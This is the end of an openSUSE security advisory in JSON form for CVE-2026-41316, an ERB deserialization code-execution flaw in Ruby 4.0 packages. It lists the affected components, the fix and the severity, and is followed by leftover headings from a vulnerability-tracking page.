            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libruby4_0-4_0-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.aarch64"
        },
        "product_reference": "libruby4_0-4_0-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libruby4_0-4_0-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.ppc64le"
        },
        "product_reference": "libruby4_0-4_0-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libruby4_0-4_0-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.s390x"
        },
        "product_reference": "libruby4_0-4_0-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libruby4_0-4_0-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.x86_64"
        },
        "product_reference": "libruby4_0-4_0-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.aarch64"
        },
        "product_reference": "ruby4.0-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.ppc64le"
        },
        "product_reference": "ruby4.0-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.s390x"
        },
        "product_reference": "ruby4.0-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.x86_64"
        },
        "product_reference": "ruby4.0-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.aarch64"
        },
        "product_reference": "ruby4.0-devel-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.ppc64le"
        },
        "product_reference": "ruby4.0-devel-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.s390x"
        },
        "product_reference": "ruby4.0-devel-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.x86_64"
        },
        "product_reference": "ruby4.0-devel-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-extra-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.aarch64"
        },
        "product_reference": "ruby4.0-devel-extra-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-extra-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.ppc64le"
        },
        "product_reference": "ruby4.0-devel-extra-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-extra-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.s390x"
        },
        "product_reference": "ruby4.0-devel-extra-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-devel-extra-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.x86_64"
        },
        "product_reference": "ruby4.0-devel-extra-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.aarch64"
        },
        "product_reference": "ruby4.0-doc-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.ppc64le"
        },
        "product_reference": "ruby4.0-doc-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.s390x"
        },
        "product_reference": "ruby4.0-doc-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.x86_64"
        },
        "product_reference": "ruby4.0-doc-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-ri-4.0.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.aarch64"
        },
        "product_reference": "ruby4.0-doc-ri-4.0.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-ri-4.0.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.ppc64le"
        },
        "product_reference": "ruby4.0-doc-ri-4.0.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-ri-4.0.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.s390x"
        },
        "product_reference": "ruby4.0-doc-ri-4.0.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "ruby4.0-doc-ri-4.0.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.x86_64"
        },
        "product_reference": "ruby4.0-doc-ri-4.0.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-41316",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-41316"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.x86_64",
          "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.x86_64",
          "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.x86_64",
          "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.x86_64",
          "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.x86_64",
          "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.aarch64",
          "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.ppc64le",
          "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.s390x",
          "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-41316",
          "url": "https://www.suse.com/security/cve/CVE-2026-41316"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1262441 for CVE-2026-41316",
          "url": "https://bugzilla.suse.com/1262441"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:libruby4_0-4_0-4.0.3-1.1.x86_64",
            "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:ruby4.0-4.0.3-1.1.x86_64",
            "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:ruby4.0-devel-4.0.3-1.1.x86_64",
            "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:ruby4.0-devel-extra-4.0.3-1.1.x86_64",
            "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:ruby4.0-doc-4.0.3-1.1.x86_64",
            "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.aarch64",
            "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.ppc64le",
            "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.s390x",
            "openSUSE Tumbleweed:ruby4.0-doc-ri-4.0.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-23T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-41316"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41316 (GCVE-0-2026-41316)

FKIE_CVE-2026-41316

GHSA-Q339-8RMV-2MHV

Summary

Impact

Scope

Severity justification

Patches

OPENSUSE-SU-2026:10609-1

Tags

Sightings

Nomenclature